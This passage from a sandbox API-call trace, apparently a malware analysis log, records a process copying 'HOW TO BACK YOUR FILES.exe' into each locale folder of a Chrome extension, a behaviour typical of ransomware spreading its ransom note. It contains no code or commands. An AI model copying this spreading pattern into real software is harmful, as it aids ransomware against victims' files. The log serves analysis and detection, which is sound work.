ftCreationTime.dwLowDateTime=0x835b6570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d550200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d550200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.241] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro" [0111.241] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro" [0111.241] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.241] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.242] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.242] GetLastError () returned 0x0 [0111.242] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.242] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835aa220, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d576360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d576360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.242] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT" [0111.243] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT" [0111.243] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.243] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.243] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.244] GetLastError () returned 0x0 [0111.244] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.244] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835990b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d576360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d576360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.244] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR" [0111.244] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR" [0111.244] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.245] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.245] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.245] GetLastError () returned 0x0 [0111.246] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.246] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835969a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d576360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d576360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt" [0111.246] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt" [0111.246] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.246] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.247] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.247] GetLastError () returned 0x0 [0111.247] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.247] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8358f470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d59c4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d59c4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.248] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl" [0111.248] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl" [0111.248] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.248] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.249] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.249] GetLastError () returned 0x0 [0111.249] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.249] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83580a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d59c4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d59c4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.250] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl" [0111.250] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl" [0111.250] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.250] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.251] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.251] GetLastError () returned 0x0 [0111.251] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.251] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835794e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5c2620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5c2620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.251] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb" [0111.252] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb" [0111.252] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.252] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.252] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.253] GetLastError () returned 0x0 [0111.253] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.253] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835041e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5c2620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5c2620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.253] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms" [0111.253] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms" [0111.253] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.253] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.254] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.254] GetLastError () returned 0x0 [0111.255] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 